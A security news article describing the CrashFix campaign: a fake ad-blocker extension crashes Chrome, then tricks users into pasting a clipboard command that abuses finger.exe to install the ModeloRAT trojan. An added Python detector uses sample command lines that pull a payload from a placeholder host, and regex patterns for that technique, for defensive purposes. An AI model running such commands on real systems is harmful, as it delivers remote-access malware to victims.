Malicious Chrome extension triggers browser crashes in new CrashFix attack

Security researchers at Huntress have uncovered a new variant of the ClickFix attack, dubbed ‘CrashFix,’ that uses a malicious Chrome extension to crash users’ browsers and then trick them into running malware themselves. As in other ClickFix lures, the victim is coaxed into pasting and executing an attacker-supplied command as the supposed “fix.”

The campaign involves a fake browser extension called ‘NexShield,’ which impersonates the legitimate uBlock Origin Lite ad blocker. Once installed, the extension deliberately creates a denial-of-service condition: it opens Chrome runtime connections in an unbounded loop, piling up millions of them until system resources are exhausted and the browser freezes or crashes.

After the crash, victims are shown a fake security warning claiming that issues have been detected. The message instructs them to open the Windows Run dialog and paste the contents of their clipboard to “fix” the problem. By then, NexShield has already silently placed a malicious PowerShell command on the clipboard, so the “repair” the victim pastes and runs is the attacker’s command.

Executing the command launches finger.exe, a legitimate built-in Windows utility, and pulls down a secondary payload that installs ModeloRAT, a Python-based remote access trojan. Notably, the malware only infects domain-joined systems, indicating a deliberate focus on corporate environments rather than home users.
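The chain described above (Run dialog, then PowerShell, then finger.exe reaching out to a remote host) leaves a recognisable trail in process-creation telemetry. What follows is an added detection example, not code from Huntress or from the article: it runs over a handful of constructed Sysmon-style process-creation records (parent image, image, command line; the field names, sample paths, hosts and command lines are all assumptions, not observed indicators) and flags a shell spawned from explorer.exe with an inline command, which is how a Run-dialog paste appears, as well as any invocation of finger.exe against a remote host.

```python
"""Flag the CrashFix/ClickFix execution chain in process-creation telemetry.

Added example; not code from Huntress or the article it accompanies.
Record layout and all sample events below are constructed assumptions.
"""
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class ProcEvent:
    """One process-creation record (Sysmon Event ID 1 / Security 4688 style)."""
    parent_image: str
    image: str
    command_line: str


# Interpreters a ClickFix lure typically has the victim launch from Win+R.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# An inline-command switch (-c/-command/-e/-enc/-encodedcommand, or cmd's /c)
# distinguishes "paste this one-liner" from a user simply opening a shell.
INLINE_CMD = re.compile(r"(?:^|\s)[-/](?:c|command|e|enc|encodedcommand)\b", re.IGNORECASE)

# finger.exe takes [user]@host; a remote host argument is what turns the
# legitimate utility into a downloader (it speaks plain TCP/79).
FINGER_REMOTE = re.compile(r"\bfinger(?:\.exe)?\s+\S*@\S+", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows (or slash-separated) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> List[str]:
    """Return the list of suspicious traits found in one event (empty if clean)."""
    findings = []
    image, parent = basename(ev.image), basename(ev.parent_image)

    # The Run dialog is hosted by explorer.exe, so a shell the victim starts
    # from it with a pasted one-liner shows up as explorer.exe -> shell + inline command.
    if image in SHELLS and parent == "explorer.exe" and INLINE_CMD.search(ev.command_line):
        findings.append("shell launched from explorer.exe with an inline command (Run-dialog paste)")

    # Either finger.exe itself is the new process, or a shell's command line drives it.
    if image == "finger.exe" and "@" in ev.command_line:
        findings.append("finger.exe invoked against a remote host (LOLBin download over TCP/79)")
    elif FINGER_REMOTE.search(ev.command_line):
        findings.append("command line chains finger.exe to a remote host")

    return findings


def scan(events: List[ProcEvent]) -> List[Tuple[int, List[str]]]:
    """Return (index, findings) for every event that triggers at least one rule."""
    return [(i, f) for i, ev in enumerate(events) if (f := classify(ev))]


# Constructed sample telemetry (assumed values; 203.0.113.7 is a documentation address).
SAMPLE_EVENTS = [
    # 0: the pasted "fix": PowerShell from the Run dialog, driving finger.exe
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell.exe -w hidden -c "finger user@203.0.113.7"'),
    # 1: the resulting child process
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\finger.exe",
              "finger.exe user@203.0.113.7"),
    # 2: benign: an admin opens an interactive PowerShell from Win+R (no inline command)
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe"),
    # 3: benign system noise
    ProcEvent(r"C:\Windows\System32\services.exe",
              r"C:\Windows\System32\svchost.exe",
              "svchost.exe -k netsvcs"),
    # 4: same lure delivered through cmd.exe instead of PowerShell
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\cmd.exe",
              "cmd.exe /c finger admin@203.0.113.7"),
]


if __name__ == "__main__":
    for idx, findings in scan(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[idx]
        print(f"[{idx}] {basename(ev.parent_image)} -> {basename(ev.image)}: {ev.command_line}")
        for f in findings:
            print(f"      - {f}")
```

The explorer.exe-to-shell rule on its own is noisy in environments where staff routinely open consoles from Win+R, which is why the example only fires when an inline-command switch is present and pairs it with the finger.exe rule; in production the same two conditions would be joined to a network-connection event from finger.exe on TCP port 79, which almost never occurs legitimately on a modern Windows estate.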

Huntress attributes the campaign to a threat actor dubbed ‘KongTuke,’ active since at least early 2025. To avoid arousing suspicion, the extension delays its malicious behavior: the first browser crash is triggered roughly an hour after installation and is then repeated periodically, so the victim has no obvious reason to connect the “problem” with the extension they just installed.

ModeloRAT supports system reconnaissance, persistence, command execution, encrypted command-and-control (C&C) communications, and anti-analysis techniques. According to Huntress, the goal appears to be access to enterprise networks, Active Directory, and sensitive internal data.
